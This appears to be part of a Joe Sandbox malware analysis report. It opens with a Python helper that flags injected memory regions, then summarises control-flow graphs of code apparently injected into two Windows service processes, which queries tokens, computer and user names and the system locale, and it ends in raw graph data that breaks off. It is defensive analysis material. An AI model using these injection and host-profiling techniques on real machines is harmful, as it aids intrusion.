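# Windows memory protection / state / type constants (winnt.h, MEMORY_BASIC_INFORMATION).
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
PAGE_MODIFIERS = {0x100: "PAGE_GUARD", 0x200: "PAGE_NOCACHE", 0x400: "PAGE_WRITECOMBINE"}
MEM_STATE = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE", 0x10000: "MEM_FREE"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}
EXEC_MASK = 0x10 | 0x20 | 0x40 | 0x80
WRITE_MASK = 0x04 | 0x08 | 0x40 | 0x80

SDMP_RE = re.compile(
    r"^(?P<proc>[0-9A-Fa-f]{8})\.(?P<round>[0-9A-Fa-f]{8})\.(?P<id>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})\."
    r"(?P<state>[0-9A-Fa-f]{8})\.(?P<type>[0-9A-Fa-f]{8})\.[0-9A-Fa-f]{8}\.sdmp$"
)


@dataclass
class DumpRegion:
    proc_index: int
    dump_round: int
    base: int
    protect: int
    state: int
    mem_type: int

    @property
    def protect_name(self) -> str:
        names = [PAGE_PROTECT.get(self.protect & 0xFF, f"0x{self.protect & 0xFF:x}")]
        names += [n for bit, n in PAGE_MODIFIERS.items() if self.protect & bit]
        return "|".join(names)

    @property
    def is_rwx(self) -> bool:
        # Writable and executable at once: no legitimate loader leaves code like this.
        return bool(self.protect & EXEC_MASK) and bool(self.protect & WRITE_MASK)

    @property
    def is_image_backed(self) -> bool:
        # MEM_IMAGE means the region is a mapped PE section; private memory is not.
        return self.mem_type == 0x1000000

    def injection_indicators(self) -> list[str]:
        ind = []
        if self.is_rwx:
            ind.append("writable+executable")
        if self.state == 0x1000 and self.mem_type == 0x20000 and self.protect & EXEC_MASK:
            ind.append("executable private (non-image) memory")
        return ind


def parse_sdmp_name(name: str) -> DumpRegion:
    m = SDMP_RE.match(name)
    if not m:
        raise ValueError(f"not a Joe Sandbox sdmp name: {name}")
    return DumpRegion(
        proc_index=int(m["proc"], 16), dump_round=int(m["round"], 16),
        base=int(m["base"], 16), protect=int(m["protect"], 16),
        state=int(m["state"], 16), mem_type=int(m["type"], 16),
    )


def describe(name: str) -> str:
    r = parse_sdmp_name(name)
    flags = ", ".join(r.injection_indicators()) or "none"
    return (f"proc {r.proc_index} round {r.dump_round} base 0x{r.base:X}: "
            f"{r.protect_name} {MEM_STATE.get(r.state, hex(r.state))} "
            f"{MEM_TYPE.get(r.mem_type, hex(r.mem_type))}; injection indicators: {flags}")


def rva(address: int, base: int) -> int:
    """Offset of a function inside its dump. Equal offsets in two dumps with
    different bases point to the same payload mapped twice."""
    return address - base


# Both dump names as they appear in this report (process 11 and process 13).
REPORT_DUMPS = [
    "0000000B.00000002.1771706818.0000000000CD0000.00000040.00001000.00020000.00000000.sdmp",
    "0000000D.00000002.2948944745.0000000000540000.00000040.00001000.00020000.00000000.sdmp",
]

if __name__ == "__main__":
    for n in REPORT_DUMPS:
        print(describe(n))
    print(hex(rva(0xCD8070, 0xCD0000)), hex(rva(0x548070, 0x540000)))
```

                                        Both dumps decode to PAGE_EXECUTE_READWRITE, MEM_COMMIT, MEM_PRIVATE, and the token-query function sits at offset 0x8070 in each, which is what you would expect if one payload was written into two host processes.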

                                        Control-flow Graph

                                        [control-flow graph omitted] Function cd5b09 (offset 0x5b09): Win32 APIs referenced in the graph: CreateThread, CloseHandle; no internal calls shown.
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1771706818.0000000000CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_cd0000_maintenanceservice.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 355f5de826a502d2b078035f50b0d1b19bc6bd6d86d359f9387c1ff3fa9cfd06
                                        • Instruction ID: 4e88c4713c2cd36903f32c0fee0c93f3fb019d73d4d61aa20cc8d46cadabe776
                                        • Opcode Fuzzy Hash: 355f5de826a502d2b078035f50b0d1b19bc6bd6d86d359f9387c1ff3fa9cfd06
                                        • Instruction Fuzzy Hash: B301683011DF468FDB6547258D183397BD1EB99334F2401ABC693CA3D5DF604B00A722

                                        Control-flow Graph

                                        [control-flow graph omitted] Function cd5910 (offset 0x5910): calls d09970, cf0df0, cd5d90, cf11a0, d02190, cd5e10 and cf1280; no Win32 API nodes in the graph. The graph also reaches blocks at ce06b3-ce081c and cec0cc-cec104.
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1771706818.0000000000CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_cd0000_maintenanceservice.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 61e7e04614083fc9a4d415ed1ed9d586c41edeef07ca5b9990f411115d9a6df2
                                        • Instruction ID: c4d399256493cddb3be92b02f6ab4d0bf39ef011bc765b2ce97f862d48bb6f57
                                        • Opcode Fuzzy Hash: 61e7e04614083fc9a4d415ed1ed9d586c41edeef07ca5b9990f411115d9a6df2
                                        • Instruction Fuzzy Hash: 97F1242171CE4C8FC6A9A71D58513BAB3D2EB99310F68029BE25EC3396CD349D469783

                                        Control-flow Graph

                                        [control-flow graph omitted] Function cd5b42 (offset 0x5b42): calls cd5d90, cf1280 and cd52a0; Win32 APIs referenced in the graph: CreateThread, CloseHandle.
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1771706818.0000000000CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_cd0000_maintenanceservice.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2ff8010c23fac40248132f603dcb160a69be8753e27de13806aa853a5623418f
                                        • Instruction ID: c20e83633843fcb0a31c162fc4cef536a8cec69b3c9000f513e85b0f070ff017
                                        • Opcode Fuzzy Hash: 2ff8010c23fac40248132f603dcb160a69be8753e27de13806aa853a5623418f
                                        • Instruction Fuzzy Hash: 4121F43022CF448FCB699B1D844873576E2EBDD351F2801AB8367CF3E6CA248E449322

                                        Control-flow Graph

                                        [control-flow graph omitted] Function cd5b87 (offset 0x5b87): Win32 APIs referenced in the graph: CreateThread (two call sites, cd5b87 and cd5cda), CloseHandle (cd5c01).
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1771706818.0000000000CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_cd0000_maintenanceservice.jbxd
                                        Similarity
                                        • API ID: CreateThread
                                        • String ID:
                                        • API String ID: 2422867632-0
                                        • Opcode ID: a986bd5c00f5553bdb8598d00602888b78738e64b994e3da4fa4453f2922062f
                                        • Instruction ID: 29308cba0010ff05afc7eb91fde416d709ba18a99fdddfe3cec8188e793709ad
                                        • Opcode Fuzzy Hash: a986bd5c00f5553bdb8598d00602888b78738e64b994e3da4fa4453f2922062f
                                        • Instruction Fuzzy Hash: 99E0863061DB444FDB599B2458107297AE5EB88314F1501CFC54ADB2D1CB790A054782

                                        Control-flow Graph

                                        [control-flow graph omitted] Function cd599b (offset 0x599b, an entry into the cd5910 body): calls cf0df0, cd5d90, cf11a0, d02190, cd5e10, d09970 and cf1280; no Win32 API nodes in the graph.
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1771706818.0000000000CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_cd0000_maintenanceservice.jbxd
                                        Similarity
                                        • API ID: wcscpy
                                        • String ID:
                                        • API String ID: 1284135714-0
                                        • Opcode ID: 51412a402b8cd50030cf07c80cfd4b00c1a38cf92c70ea7e66de183ec09a8362
                                        • Instruction ID: a3405fb1751612f1157b230ef9d6a781932da13e742da688a7d76786448759ab
                                        • Opcode Fuzzy Hash: 51412a402b8cd50030cf07c80cfd4b00c1a38cf92c70ea7e66de183ec09a8362
                                        • Instruction Fuzzy Hash: DD01497090DF90CFD717DB1940613796652F754330F28015BA34ECB392C9344F02A752

                                        Control-flow Graph

                                        [control-flow graph omitted] Function cd5be2 (offset 0x5be2): calls cd5e10 and cd5910; Win32 API referenced in the graph: CloseHandle (cd5bfc).
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1771706818.0000000000CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_cd0000_maintenanceservice.jbxd
                                        Similarity
                                        • API ID: CloseHandle
                                        • String ID:
                                        • API String ID: 2962429428-0
                                        • Opcode ID: 5b5d7b071b63003723a190de38853bb16d482f491faa3db3b767200ea78fc1cb
                                        • Instruction ID: 273c12efb8a9d9102b61a152daf859df7a1764666b7d766df5e999b35a9350ed
                                        • Opcode Fuzzy Hash: 5b5d7b071b63003723a190de38853bb16d482f491faa3db3b767200ea78fc1cb
                                        • Instruction Fuzzy Hash: 51E02B35528F0ADFEBA4A61ACA4967532C1D77C3E032405238B03C7310E454CF066722

                                        Control-flow Graph

                                        [control-flow graph omitted] Function cd8090 (offset 0x8090, an entry into the cd8070 body): calls d0715c, cd5d90, cdec00, cf1280 and d07164; Win32 APIs referenced in the graph: CloseHandle (cd8186), GetTokenInformation (cd80ca and cd81fe).
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1771706818.0000000000CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_cd0000_maintenanceservice.jbxd
                                        Similarity
                                        • API ID: CloseHandle
                                        • String ID:
                                        • API String ID: 2962429428-0
                                        • Opcode ID: 618394ff9deb9f6b5e010b5aaee4db8be701b981e1d63e6b3fb36a727850c086
                                        • Instruction ID: 777a05c7c737e50f6aa2a78cc3b4d2c1d03c3fc73b8594db4e3364e53eb5af10
                                        • Opcode Fuzzy Hash: 618394ff9deb9f6b5e010b5aaee4db8be701b981e1d63e6b3fb36a727850c086
                                        • Instruction Fuzzy Hash: 42C08C6012CC02B7523802490C0B0FC66209202790B4C00078F2A80320DD048F0F0097

                                        Control-flow Graph

                                        [control-flow graph omitted] Function cd817f (offset 0x817f, another entry into the cd8070 body): calls d0715c, cd5d90, cdec00, cf1280 and d07164; Win32 APIs referenced in the graph: CloseHandle (cd8186), GetTokenInformation (cd80ca and cd81fe).
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1771706818.0000000000CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_cd0000_maintenanceservice.jbxd
                                        Similarity
                                        • API ID: CloseHandle
                                        • String ID:
                                        • API String ID: 2962429428-0
                                        • Opcode ID: a0153765961d18982154f5649a6418830ea2767f573826a199b39b51e69f8ae7
                                        • Instruction ID: 3dc8fd7770f5edc2f34371dde0228f5563fc9f541b929d54e364e8c3a231475e
                                        • Opcode Fuzzy Hash: a0153765961d18982154f5649a6418830ea2767f573826a199b39b51e69f8ae7
                                        • Instruction Fuzzy Hash: ECC092A055C909A7513826892C0A0BD75605613BA0F0C4513EF2A8A360DD584F4F41A2

                                        Execution Graph

                                        Execution Coverage:4.2%
                                        Dynamic/Decrypted Code Coverage:97.6%
                                        Signature Coverage:0%
                                        Total number of Nodes:84
                                        Total number of Limit Nodes:1
                                        [execution graph omitted] Graph of the process-13 dump at base 0x540000. Its function offsets match the process-11 dump at 0xCD0000 above (548070 vs cd8070, 545b09 vs cd5b09, 545b87 vs cd5b87, 545be2 vs cd5be2), i.e. the same injected code at a different base. Paths recorded:
                                        • 548070/548090/5481b1 -> 548075: GetTokenInformation (5480ca, 5481ad), CloseHandle (548186).
                                        • 545b09, 545b42, 545b87 -> 545cdf CreateThread -> 545c03 CloseHandle; 545be2 -> 545bfc CloseHandle.
                                        • 545b00 and 545860 -> 5552c0 -> 54e050 VirtualAlloc; then 560080: GetComputerNameW (5603e0, 5604d6), GetUserNameW (5603bf), VirtualFree (560181), VirtualAlloc via 54e050; then 548070 (GetTokenInformation, CloseHandle).
                                        • 5457f0 and 5455ef -> 5455ac -> 563870 -> 563720 -> 550c42 -> 54e050 VirtualAlloc.

                                        Control-flow Graph

                                        [control-flow graph omitted] Function 5452a0 (offset 0x52a0, process-13 dump): one Win32 API in the graph, GetSystemDefaultLangID at 5453c4 (the locale check); the graph also reaches a block at 580d4c.
                                        APIs
                                        • GetSystemDefaultLangID.KERNELBASE ref: 005453C4
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2948944745.0000000000540000.00000040.00001000.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_540000_PerceptionSimulationService.jbxd
                                        Similarity
                                        • API ID: DefaultLangSystem
                                        • String ID:
                                        • API String ID: 706401283-0
                                        • Opcode ID: be85cc28eff309c6b04ec446b1d1922c7f56a33d23bc4027ac3bc4e0d37bd274
                                        • Instruction ID: 927071a1aa7673c7b83d6b8e8428acd04324f3f3a2b659cde0c9f6f1af0bf8a3
                                        • Opcode Fuzzy Hash: be85cc28eff309c6b04ec446b1d1922c7f56a33d23bc4027ac3bc4e0d37bd274
                                        • Instruction Fuzzy Hash: 1F41D67650DE954FD72A4E2444643F47FA0BB123EEF990CE7E4828A0E7F1D80C859326

                                        Control-flow Graph

                                        [control-flow graph omitted] Function 560080 (offset 0x20080, process-13 dump): calls 54e050 (twice), 577164, 57715c and 579970; Win32 APIs referenced in the graph: GetComputerNameW (560458 and 5604cc), GetUserNameW (5603bf), VirtualFree (560181). The graph also reaches blocks at 56b1ee-56b49f.
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2948944745.0000000000540000.00000040.00001000.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_540000_PerceptionSimulationService.jbxd
                                        Similarity
                                        • API ID: ComputerName
                                        • String ID:
                                        • API String ID: 3545744682-0
                                        • Opcode ID: a53a589e1d79c8daebd35e0be32d5c07406a5a25e6b1b8ac5d66ad9906a0b4eb
                                        • Instruction ID: 64214aa17436fdf41c190b058ea6c0bdb9a44f05f3b9fc491ea7c88488750e93
                                        • Opcode Fuzzy Hash: a53a589e1d79c8daebd35e0be32d5c07406a5a25e6b1b8ac5d66ad9906a0b4eb
                                        • Instruction Fuzzy Hash: 8FD12331418B098BCB68EF58DC497EBBBD1FBA1310F585A1ED846C31A4DA749A45CAC2

                                        Control-flow Graph

                                        [control-flow graph omitted] Function 548070 (offset 0x8070, process-13 dump; same offset as cd8070 in the process-11 dump): calls 577164, 57715c, 545d90, 54ec00 and 561280; Win32 APIs referenced in the graph: CloseHandle (548186), GetTokenInformation (5480ca and 5481fe).
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2948944745.0000000000540000.00000040.00001000.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_540000_PerceptionSimulationService.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4e190fe7d4b3c5e57d75e6528bbdfe52906c1a61a35aefbd00297ac479a6f7d8
                                        • Instruction ID: b4d5920a73ca574d6ae552fbf0fe266f340490efb7d09a8b7945718d7bda02d0
                                        • Opcode Fuzzy Hash: 4e190fe7d4b3c5e57d75e6528bbdfe52906c1a61a35aefbd00297ac479a6f7d8
                                        • Instruction Fuzzy Hash: DC615634A1CA859FC7698B2888183FE7FA0FB9535CF585A5BE40BC31A0DF645C49D352

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        [Control-flow graph rendering for the function starting at 545b09 (basic blocks 545b09-545d65); edge data omitted. Named API calls: CreateThread, CloseHandle.]
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2948944745.0000000000540000.00000040.00001000.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_540000_PerceptionSimulationService.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 355f5de826a502d2b078035f50b0d1b19bc6bd6d86d359f9387c1ff3fa9cfd06
                                        • Instruction ID: 365c26fd6ae7b30620fe51d5fb4879bfb29cc063778c06d4be93e4cf0e8383e8
                                        • Opcode Fuzzy Hash: 355f5de826a502d2b078035f50b0d1b19bc6bd6d86d359f9387c1ff3fa9cfd06
                                        • Instruction Fuzzy Hash: AA01C03090DF4A8FDB5A56248C983F97F90FF5132CF2409AAC487CA093FA604E04A702

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        [Control-flow graph rendering for the function starting at 545910 (basic blocks 545910-55c104); edge data omitted. Internal calls: 579970, 560df0, 545d90, 545e10, 5611a0, 5721ac, 572190, 561280.]
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2948944745.0000000000540000.00000040.00001000.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_540000_PerceptionSimulationService.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 61e7e04614083fc9a4d415ed1ed9d586c41edeef07ca5b9990f411115d9a6df2
                                        • Instruction ID: 6335a11eab77b8ec49bf549edb891a2ac7a89a609b4502f4fd064d9bba06117a
                                        • Opcode Fuzzy Hash: 61e7e04614083fc9a4d415ed1ed9d586c41edeef07ca5b9990f411115d9a6df2
                                        • Instruction Fuzzy Hash: 1FF1463071CE498FC669A72C58552B9BFD2FBD9314F58469FE44AC3297DD249C0AC382

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        [Control-flow graph rendering for the function starting at 545b42 (basic blocks 545b0d-545d75); edge data omitted. Named API calls: CreateThread, CloseHandle. Internal calls: 545d90, 561280, 5452a0.]
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2948944745.0000000000540000.00000040.00001000.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_540000_PerceptionSimulationService.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2ff8010c23fac40248132f603dcb160a69be8753e27de13806aa853a5623418f
                                        • Instruction ID: 6a451dcbb2178a8214b9300c39cb10af5ad5b84a0b0f7115b1d86a6fdb71f511
                                        • Opcode Fuzzy Hash: 2ff8010c23fac40248132f603dcb160a69be8753e27de13806aa853a5623418f
                                        • Instruction Fuzzy Hash: CD21B03060CF458FCB6A9B1884D87F82EE1FB5535CF6809A69047CF1A3FA248D48A716

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        [Control-flow graph rendering for the function starting at 545b87 (basic blocks 545b1c-545d65); edge data omitted. Named API calls: CreateThread, CloseHandle.]
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2948944745.0000000000540000.00000040.00001000.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_540000_PerceptionSimulationService.jbxd
                                        Similarity
                                        • API ID: CreateThread
                                        • String ID:
                                        • API String ID: 2422867632-0
                                        • Opcode ID: a986bd5c00f5553bdb8598d00602888b78738e64b994e3da4fa4453f2922062f
                                        • Instruction ID: 4359e14aefa73c9c83cbeb62bb32a3486051b077a69b5865e898a264d27d4df9
                                        • Opcode Fuzzy Hash: a986bd5c00f5553bdb8598d00602888b78738e64b994e3da4fa4453f2922062f
                                        • Instruction Fuzzy Hash: 2DE0863060DB444FDB5A9B2458243593EE5FB88318F1545CEC44BD71D6EF690D064782

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        [Control-flow graph rendering for the function starting at 54599b (basic blocks 545932-545af5); edge data omitted. Internal calls: 560df0, 545d90, 5611a0, 545e10, 572190, 5721ac, 561280, 579970.]
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2948944745.0000000000540000.00000040.00001000.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_540000_PerceptionSimulationService.jbxd
                                        Similarity
                                        • API ID: wcscpy
                                        • String ID:
                                        • API String ID: 1284135714-0
                                        • Opcode ID: 51412a402b8cd50030cf07c80cfd4b00c1a38cf92c70ea7e66de183ec09a8362
                                        • Instruction ID: 25bcbd03c4af5bcfacd1beb5e12f657b9547dec78a4237fb82e5c17da44d8956
                                        • Opcode Fuzzy Hash: 51412a402b8cd50030cf07c80cfd4b00c1a38cf92c70ea7e66de183ec09a8362
                                        • Instruction Fuzzy Hash: 0E01F970A1DE85CFD75B971844492F96E51FB9432CF68495A908EC7193F9344D04D342

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        [Control-flow graph rendering for the function starting at 545be2 (basic blocks 545be2-545d65); edge data omitted. Named API call: CloseHandle. Internal calls: 545e10, 545910.]
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2948944745.0000000000540000.00000040.00001000.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_540000_PerceptionSimulationService.jbxd
                                        Similarity
                                        • API ID: CloseHandle
                                        • String ID:
                                        • API String ID: 2962429428-0
                                        • Opcode ID: 5b5d7b071b63003723a190de38853bb16d482f491faa3db3b767200ea78fc1cb
                                        • Instruction ID: 0d8858ea065ca2220240dc58c6a3cffb72e3430fcc900ceafe2952875fe3727d
                                        • Opcode Fuzzy Hash: 5b5d7b071b63003723a190de38853bb16d482f491faa3db3b767200ea78fc1cb
                                        • Instruction Fuzzy Hash: 9CE0C231928E1ACFEB55A618C8893F52EC0FF2436D3240D218803CB113F514CF06AB42

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        [Control-flow graph rendering for the function starting at 548090 (basic blocks 548077-548335); edge data omitted. Named API calls: CloseHandle, GetTokenInformation. Internal calls: 57715c, 545d90, 54ec00, 577164, 561280.]
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2948944745.0000000000540000.00000040.00001000.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_540000_PerceptionSimulationService.jbxd
                                        Similarity
                                        • API ID: CloseHandle
                                        • String ID:
                                        • API String ID: 2962429428-0
                                        • Opcode ID: 618394ff9deb9f6b5e010b5aaee4db8be701b981e1d63e6b3fb36a727850c086
                                        • Instruction ID: adc44f8cf9e97c632eb6b452512afc57d8f9b62661d189a1f92a09ff516725e0
                                        • Opcode Fuzzy Hash: 618394ff9deb9f6b5e010b5aaee4db8be701b981e1d63e6b3fb36a727850c086
                                        • Instruction Fuzzy Hash: 70C08C7056888296623802880C0F0FC3E00B20635CB0C28078C0381220DD149E03C097

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        [Control-flow graph rendering for the function starting at 54817f (basic blocks 548077-548335); edge data omitted. Named API calls: CloseHandle, GetTokenInformation. Internal calls: 57715c, 545d90, 54ec00, 577164, 561280.]
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2948944745.0000000000540000.00000040.00001000.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_540000_PerceptionSimulationService.jbxd
                                        Similarity
                                        • API ID: CloseHandle
                                        • String ID:
                                        • API String ID: 2962429428-0
                                        • Opcode ID: a0153765961d18982154f5649a6418830ea2767f573826a199b39b51e69f8ae7
                                        • Instruction ID: c4fdb6359c81256bcc9ed649872d79b7cd7818aab9904ffe55d7fa6c9302413a
                                        • Opcode Fuzzy Hash: a0153765961d18982154f5649a6418830ea2767f573826a199b39b51e69f8ae7
                                        • Instruction Fuzzy Hash: 84C092B499855987613826C82C0E0FD3D50761B768F0C6823EC178B364DD686D53C1A2

                                        Execution Graph

                                        Execution Coverage:0.2%
                                        Dynamic/Decrypted Code Coverage:100%
                                        Signature Coverage:6%
                                        Total number of Nodes:927
                                        Total number of Limit Nodes:2
                                        [Execution graph rendering for code at addresses 79fd79-7a4d9a (graph nodes 6665-7199); edge data omitted. Named API calls: GetLastError, SetLastError, TlsGetValue, TlsSetValue, RtlAllocateHeap, HeapFree, GetProcAddress, LoadLibraryExW, FreeLibrary, IsProcessorFeaturePresent, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, ExitProcess, GetModuleHandleW, GetModuleHandleExW, GetPEB, GetOEMCP, GetACP, RtlEnterCriticalSection, RtlLeaveCriticalSection. CRT helper names resolved by the plugin: __dosmaperr, _free, _abort, __fassign, __startOneArgErrorHandling.]
7196->7199 7197->7193 7197->7195 7198 7a4356 __dosmaperr 7 API calls 7197->7198 7198->7197 7200 7a29ae 40 API calls 7199->7200 7201 7a2dfa 7200->7201 7204 7a2e4b IsValidCodePage 7201->7204 7206 7a2e01 7201->7206 7207 7a2e70 _abort 7201->7207 7202 7a4c0d __startOneArgErrorHandling 5 API calls 7203 7a2c7c 7202->7203 7203->7178 7203->7181 7205 7a2e5d GetCPInfo 7204->7205 7204->7206 7205->7206 7205->7207 7206->7202 7212 7a2a86 GetCPInfo 7207->7212 7285 7a2841 7209->7285 7211 7a28a8 7211->7184 7213 7a2b6a 7212->7213 7214 7a2ac0 7212->7214 7217 7a4c0d __startOneArgErrorHandling 5 API calls 7213->7217 7222 7a34ff 7214->7222 7219 7a2c16 7217->7219 7219->7206 7221 7a4706 43 API calls 7221->7213 7223 79fd79 __fassign 38 API calls 7222->7223 7224 7a351f MultiByteToWideChar 7223->7224 7226 7a355d 7224->7226 7227 7a35f5 7224->7227 7229 7a32fa 21 API calls 7226->7229 7233 7a357e _abort 7226->7233 7228 7a4c0d __startOneArgErrorHandling 5 API calls 7227->7228 7230 7a2b21 7228->7230 7229->7233 7236 7a4706 7230->7236 7231 7a35ef 7241 7a361c 7231->7241 7233->7231 7234 7a35c3 MultiByteToWideChar 7233->7234 7234->7231 7235 7a35df GetStringTypeW 7234->7235 7235->7231 7237 79fd79 __fassign 38 API calls 7236->7237 7238 7a4719 7237->7238 7245 7a44e9 7238->7245 7242 7a3628 7241->7242 7244 7a3639 7241->7244 7243 7a2096 _free 20 API calls 7242->7243 7242->7244 7243->7244 7244->7227 7246 7a4504 7245->7246 7247 7a452a MultiByteToWideChar 7246->7247 7248 7a46de 7247->7248 7249 7a4554 7247->7249 7250 7a4c0d __startOneArgErrorHandling 5 API calls 7248->7250 7252 7a32fa 21 API calls 7249->7252 7254 7a4575 7249->7254 7251 7a2b42 7250->7251 7251->7221 7252->7254 7253 7a45be MultiByteToWideChar 7255 7a45d7 7253->7255 7267 7a462a 7253->7267 7254->7253 7254->7267 7272 7a2317 7255->7272 7257 7a361c __freea 20 API calls 7257->7248 7259 7a4639 7261 7a465a 7259->7261 7262 7a32fa 21 API calls 7259->7262 7260 7a4601 7264 7a2317 11 API calls 7260->7264 7260->7267 7263 7a46cf 7261->7263 7265 7a2317 11 API calls 
7261->7265 7262->7261 7266 7a361c __freea 20 API calls 7263->7266 7264->7267 7268 7a46ae 7265->7268 7266->7267 7267->7257 7268->7263 7269 7a46bd WideCharToMultiByte 7268->7269 7269->7263 7270 7a46fd 7269->7270 7271 7a361c __freea 20 API calls 7270->7271 7271->7267 7273 7a20ef __dosmaperr 5 API calls 7272->7273 7274 7a233e 7273->7274 7277 7a2347 7274->7277 7280 7a239f 7274->7280 7278 7a4c0d __startOneArgErrorHandling 5 API calls 7277->7278 7279 7a2399 7278->7279 7279->7259 7279->7260 7279->7267 7281 7a20ef __dosmaperr 5 API calls 7280->7281 7282 7a23c6 7281->7282 7283 7a4c0d __startOneArgErrorHandling 5 API calls 7282->7283 7284 7a2387 LCMapStringW 7283->7284 7284->7277 7286 7a284d _abort 7285->7286 7293 7a2813 RtlEnterCriticalSection 7286->7293 7288 7a2857 7294 7a28ac 7288->7294 7292 7a2870 _abort 7292->7211 7293->7288 7306 7a2fcc 7294->7306 7296 7a28fa 7297 7a2fcc 26 API calls 7296->7297 7298 7a2916 7297->7298 7299 7a2fcc 26 API calls 7298->7299 7300 7a2934 7299->7300 7301 7a2864 7300->7301 7302 7a2096 _free 20 API calls 7300->7302 7303 7a2878 7301->7303 7302->7301 7320 7a282a RtlLeaveCriticalSection 7303->7320 7305 7a2882 7305->7292 7307 7a2fdd 7306->7307 7311 7a2fd9 7306->7311 7308 7a2fe4 7307->7308 7312 7a2ff7 _abort 7307->7312 7309 7a15d3 __dosmaperr 20 API calls 7308->7309 7310 7a2fe9 7309->7310 7313 7a1517 _abort 